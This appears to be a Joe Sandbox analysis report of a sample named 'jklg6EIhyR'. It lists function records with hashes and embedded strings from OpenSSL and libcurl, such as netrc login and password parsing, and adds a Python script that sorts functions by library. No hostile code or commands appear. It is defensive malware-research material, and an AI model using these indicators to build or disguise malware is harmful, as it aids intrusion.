                                                    • Instruction ID: 90db5ba85c19f4198f5a668f47832bbae3285f0ab154bfefbf4a9f2757cd61a6
                                                    • Opcode Fuzzy Hash: fdd083c6dd855bdfa6735a9ac11f67d3a9d4484dcbb22bcbe530bcb48a1b5f55
                                                    • Instruction Fuzzy Hash: 77C26A716083419FDB14CE28C49076AB7E2BFC9394F15CA2DE89D9B352D738ED458B82
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                                    • API String ID: 0-2555271450
                                                    • Opcode ID: 82624f27b6664d8f711dfb20135e52f3c1f3ebd592a6ea6b4c5a31ac0b6874a7
                                                    • Instruction ID: 92c85313ce802996d28662e09c153a31a718c295078360d91bdaeb95de9abed0
                                                    • Opcode Fuzzy Hash: 82624f27b6664d8f711dfb20135e52f3c1f3ebd592a6ea6b4c5a31ac0b6874a7
                                                    • Instruction Fuzzy Hash: A0828071A083419FDB14CE28C98072BB7E1AFC93A4F14CA6DF9AD97291D738DC458B52
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: default$login$macdef$machine$netrc.c$password
                                                    • API String ID: 0-1043775505
                                                    • Opcode ID: cfde4c63f1fd0e22ba9e7a54ec13816776e7cb087a9a81031f7b2f76e5ef9895
                                                    • Instruction ID: b5dfc91693a616f2e7c26f1d95194c6308a41798a965351e850f342559fa2b70
                                                    • Opcode Fuzzy Hash: cfde4c63f1fd0e22ba9e7a54ec13816776e7cb087a9a81031f7b2f76e5ef9895
                                                    • Instruction Fuzzy Hash: 60E1117090C3419BE7119F24988572BBBF4AF95748F08482EF88557382E3BDD948CBA2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ????$Invalid input packet$SMB upload needs to know the size up front$\$\\
                                                    • API String ID: 0-4201740241
                                                    • Opcode ID: c3306e22041bc344d2d0bd3f3ec5a68b3b1595db798b1028658d7f020889f9fb
                                                    • Instruction ID: 95ba65db5e7211231449ec3494c1135c22f43708dac0dd282fe4a46ccaebacdb
                                                    • Opcode Fuzzy Hash: c3306e22041bc344d2d0bd3f3ec5a68b3b1595db798b1028658d7f020889f9fb
                                                    • Instruction Fuzzy Hash: BC62C0B0A14741DBD714CF24C4907AAB7F4FF98304F04961EE8898B352E779EA94CB96
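One way to triage a long run of these function records, as an added example that is not part of the Joe Sandbox report or its tooling: parse each "Strings" record, split the "$"-joined String ID back into the individual embedded strings, and flag functions whose strings name a known library source file or verbatim error message (crypto/evp/evp_enc.c from OpenSSL; netrc.c and the "SMB upload needs to know the size up front" message from libcurl; the "xn--" punycode prefix from IDN handling). Functions with no such marker are the ones worth reversing first, since statically linked library code is known-good noise. The LIBRARY_MARKERS mapping is an analyst heuristic supplied here, not something the report asserts, and the embedded sample is a constructed excerpt of five records copied from this page with the repeated Associated dump lines omitted.

```python
"""Triage Joe Sandbox 'Strings' function records by embedded-string provenance.

Added example, not part of the Joe Sandbox report or its tooling. The record
layout mirrors the report text; LIBRARY_MARKERS is an analyst-maintained
heuristic (assumption), not a mapping the report asserts.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Analyst heuristic (assumption): strings that identify statically linked
# library code. Source-file paths and verbatim error messages are strong
# markers; short generic tokens such as 'login' are deliberately left out.
LIBRARY_MARKERS = {
    "crypto/evp/evp_enc.c": "OpenSSL libcrypto",
    "netrc.c": "libcurl",
    "SMB upload needs to know the size up front": "libcurl",
    "xn--": "IDN/punycode handling",
}

# Constructed sample: five records copied from this report, with the repeated
# 'Associated' dump lines and the IDA plugin lines omitted for brevity.
SAMPLE = """\
Strings
Memory Dump Source
• Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
• API ID:
• String ID: !$EVP_DecryptFinal_ex$EVP_DecryptUpdate$EVP_EncryptFinal_ex$assertion failed: b <= sizeof(ctx->buf)$assertion failed: b <= sizeof(ctx->final)$crypto/evp/evp_enc.c
• API String ID: 0-2550110336
• Opcode ID: e5c9a61349646eaf48d287c59204d66f6aa92e8cc054288cefd25237d88bcc30
• Instruction Fuzzy Hash: 67325734B48310EFD724AAA09C43F7B7799AF80B08F184928F945662D7E7B4E8548F52
Strings
• String ID: $.$;$?$?$xn--$xn--
• API String ID: 0-543057197
• Opcode ID: 458bc0157e721e047bb302493944f418a18c6404993733a47ba20545a7d55346
• Instruction Fuzzy Hash: 0922C1B2E08705ABEB249A289C41B6B76D4FFD4348F04453CFA99D6293E735D9048BD2
Strings
• String ID: default$login$macdef$machine$netrc.c$password
• API String ID: 0-1043775505
• Opcode ID: cfde4c63f1fd0e22ba9e7a54ec13816776e7cb087a9a81031f7b2f76e5ef9895
• Instruction Fuzzy Hash: 60E1117090C3419BE7119F24988572BBBF4AF95748F08482EF88557382E3BDD948CBA2
Strings
• String ID: ????$Invalid input packet$SMB upload needs to know the size up front$\\$\\\\
• API String ID: 0-4201740241
• Opcode ID: c3306e22041bc344d2d0bd3f3ec5a68b3b1595db798b1028658d7f020889f9fb
• Instruction Fuzzy Hash: BC62C0B0A14741DBD714CF24C4907AAB7F4FF98304F04961EE8898B352E779EA94CB96
Strings
• String ID: 0123456789$0123456789ABCDEF$0123456789abcdef$:
• API String ID: 0-3285806060
• Opcode ID: e20ae431365e0e7d64d0a95a1fee93f7607650ee14888faf67f8151dc6c4ace5
• Instruction Fuzzy Hash: EFD1E372A083658BD7249E28E84137EBBD1FF91354F14492DF8C9D7282DB359AC4D782
"""

# Every field line in the report is '• Key: value'; the key runs to the first colon.
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")


@dataclass
class FunctionRecord:
    opcode_id: str = ""
    instruction_fuzzy_hash: str = ""   # kept for matching against other reports
    api_string_id: str = ""
    strings: List[str] = field(default_factory=list)
    libraries: List[str] = field(default_factory=list)


def split_string_id(value: str) -> List[str]:
    """The report joins embedded strings with '$'; keep order, drop empties and repeats."""
    seen, out = set(), []
    for s in value.split("$"):
        if s and s not in seen:
            seen.add(s)
            out.append(s)
    return out


def parse_records(text: str) -> List[FunctionRecord]:
    """Each record opens with a bare 'Strings' label; fields follow as bullet lines."""
    records: List[FunctionRecord] = []
    current = None
    for line in text.splitlines():
        if line.strip() == "Strings":
            current = FunctionRecord()
            records.append(current)
            continue
        m = FIELD_RE.match(line) if current is not None else None
        if not m:
            continue
        key, value = m.group("key").strip(), m.group("value").strip()
        if key == "Opcode ID":
            current.opcode_id = value
        elif key == "Instruction Fuzzy Hash":
            current.instruction_fuzzy_hash = value
        elif key == "API String ID":
            current.api_string_id = value
        elif key == "String ID":
            current.strings = split_string_id(value)
            current.libraries = sorted({lib for s in current.strings
                                        for marker, lib in LIBRARY_MARKERS.items()
                                        if marker in s})
    return records


def summarize(records: List[FunctionRecord]) -> Tuple[Dict[str, int], List[str]]:
    """Per-library record counts plus the Opcode IDs of functions with no library hint."""
    counts: Dict[str, int] = {}
    unattributed: List[str] = []
    for r in records:
        if not r.libraries:
            unattributed.append(r.opcode_id)
        for lib in r.libraries:
            counts[lib] = counts.get(lib, 0) + 1
    return counts, unattributed


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    by_lib, todo = summarize(recs)
    print("library attribution:", by_lib)
    print("functions to reverse first:", todo)
```

Run it against the full report text instead of SAMPLE and the unattributed list shrinks to the functions that are actually specific to this sample; the Instruction Fuzzy Hash of each record is retained so those functions can be matched against other reports of the same family.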
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $d$nil)
                                                    • API String ID: 0-394766432
                                                    • Opcode ID: 7da241774002d73c9ca6fd864543153c2c2177abf02d14881242e76ad0b88c99
                                                    • Instruction ID: a2395ff83c1e0d7cd4481c053def702cc7059f61b027578db0620d03c73a97cb
                                                    • Opcode Fuzzy Hash: 7da241774002d73c9ca6fd864543153c2c2177abf02d14881242e76ad0b88c99
                                                    • Instruction Fuzzy Hash: 1E1358706083498FD720DF68C18072ABBE1BF99354F244A6DFA959B3A1D771EC45CB82
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0123456789$0123456789ABCDEF$0123456789abcdef$:
                                                    • API String ID: 0-3285806060
                                                    • Opcode ID: e20ae431365e0e7d64d0a95a1fee93f7607650ee14888faf67f8151dc6c4ace5
                                                    • Instruction ID: 3dfc3fd91f5f11515da31caf345a04bb2ecc17e452a681f69638e17f6d5bf603
                                                    • Opcode Fuzzy Hash: e20ae431365e0e7d64d0a95a1fee93f7607650ee14888faf67f8151dc6c4ace5
                                                    • Instruction Fuzzy Hash: EFD1E372A083658BD7249E28E84137EBBD1FF91354F14492DF8C9D7282DB359AC4D782
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .$@$gfff$gfff
                                                    • API String ID: 0-2633265772
                                                    • Opcode ID: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
                                                    • Instruction ID: 4e13706ddf3ad79ff15df9da4b2ff67db475d65f501507f25b6b41920009c512
                                                    • Opcode Fuzzy Hash: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
                                                    • Instruction Fuzzy Hash: EFD1A071A0430E8BDB14DF6AC68033ABBE2AF84354F18C92DFA599B355D770DD098792
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $ $h&
                                                    • API String ID: 0-309109416
                                                    • Opcode ID: 51774a970d6a072754113d74bf0de453193780fec75d970aa587230d569636a5
                                                    • Instruction ID: 6502aaecfd79e06cc50ba3dd09bbb484433989a49bf5f99b180dd82eee013f53
                                                    • Opcode Fuzzy Hash: 51774a970d6a072754113d74bf0de453193780fec75d970aa587230d569636a5
                                                    • Instruction Fuzzy Hash: 81E203B1A083418FD714DF29C58875AFBE0FF88744F148D9DE899973A1E775E8488B82
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .12$M 0.$NT L
                                                    • API String ID: 0-1919902838
                                                    • Opcode ID: cd0d1e9ac658692f0645216f77c0c0d1845a5e19ad20fbe7e42e295a25fe79ee
                                                    • Instruction ID: 4c71ce3a26b493a53cb231dd296f1e70aefdd54b441aa1463223b0613f71494b
                                                    • Opcode Fuzzy Hash: cd0d1e9ac658692f0645216f77c0c0d1845a5e19ad20fbe7e42e295a25fe79ee
                                                    • Instruction Fuzzy Hash: 4651C474600344EBDB11DF20C884BAA77F4BF59314F18866AEC489F352E779DA84CB96
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: O$BQ`
                                                    • API String ID: 0-3493499197
                                                    • Opcode ID: 22ace2b0cb642765108703e08c9791a2e5a8056157ac419f53a088e80ef6c5a9
                                                    • Instruction ID: b655368dbd74e1257e2d5edf8485f5beb90698f2f0de77f4d06d347d537293d5
                                                    • Opcode Fuzzy Hash: 22ace2b0cb642765108703e08c9791a2e5a8056157ac419f53a088e80ef6c5a9
                                                    • Instruction Fuzzy Hash: 78A28C71A08755CFCB18CF29C490AA9BBE1FF88314F16866DF9998B341D734E981CB91
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: #$4
                                                    • API String ID: 0-353776824
                                                    • Opcode ID: bbb2e5d9edcff4f6e8db7d7d4003d886e229b44ab9a9f45fe315897f4cf2a7b9
                                                    • Instruction ID: 9a2727949b11a52deb459b7098324eeffdcf0d1278c15bb58a4c49779b2871bf
                                                    • Opcode Fuzzy Hash: bbb2e5d9edcff4f6e8db7d7d4003d886e229b44ab9a9f45fe315897f4cf2a7b9
                                                    • Instruction Fuzzy Hash: EA22C1315087818FC714DF29C8806AAF7E1FF85318F158B2DE89D97391D778A885CB96
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: H$xn--
                                                    • API String ID: 0-4022323365
                                                    • Opcode ID: a4b5005b7dff93da08d06a550a8272642f03e55de633c2457f448f31da1c4150
                                                    • Instruction ID: 633b59d570a6370b7290a119db645f7af0f7680084141bc90c87a2cbf7dbf9e8
                                                    • Opcode Fuzzy Hash: a4b5005b7dff93da08d06a550a8272642f03e55de633c2457f448f31da1c4150
                                                    • Instruction Fuzzy Hash: 26E117316087198BD718DF68D8C063BB7E2ABC8314F198A3DFA9687391E774DC458782
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Downgrades to HTTP/1.1$multi.c
                                                    • API String ID: 0-3089350377
                                                    • Opcode ID: 427e8d3e63f12662882f4551b03ba4c0d09ccbac847602805af684b0805b0091
                                                    • Instruction ID: d876489cc8da8b518d4a6330156a25f0a9c60382da76c8ccccf81468755503b5
                                                    • Opcode Fuzzy Hash: 427e8d3e63f12662882f4551b03ba4c0d09ccbac847602805af684b0805b0091
                                                    • Instruction Fuzzy Hash: 8DC12571B84701ABD710FF24D8857AAB7E4BF95304F44852CF44887292E778E95ACB92
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 127.0.0.1$::1
                                                    • API String ID: 0-3302937015
                                                    • Opcode ID: 86e1ee86a0c5eb4f4cc07aac1acd1d5c90edca02a6942562925283b532e56ca7
                                                    • Instruction ID: 2432e9a9b1ed4b6a741ee654911945cb2e390cfb9c960ba6f86530055449ce59
                                                    • Opcode Fuzzy Hash: 86e1ee86a0c5eb4f4cc07aac1acd1d5c90edca02a6942562925283b532e56ca7
                                                    • Instruction Fuzzy Hash: C1A1CCB1D083429BE710DF24C94572AB3E0FF95304F159A29F8899B261F7B4E990C7D2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: M}
                                                    • API String ID: 0-2404558933
                                                    • Opcode ID: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                                                    • Instruction ID: aaa93ef45e04b597fc46bcd94fcfa5ab8b0d119f5eca27813093c9e89346d6d2
                                                    • Opcode Fuzzy Hash: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                                                    • Instruction Fuzzy Hash: AB2264735417044BE318CF2FCC81582B3E3AFD822475F857EC926CB696EEB9A61B4548
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
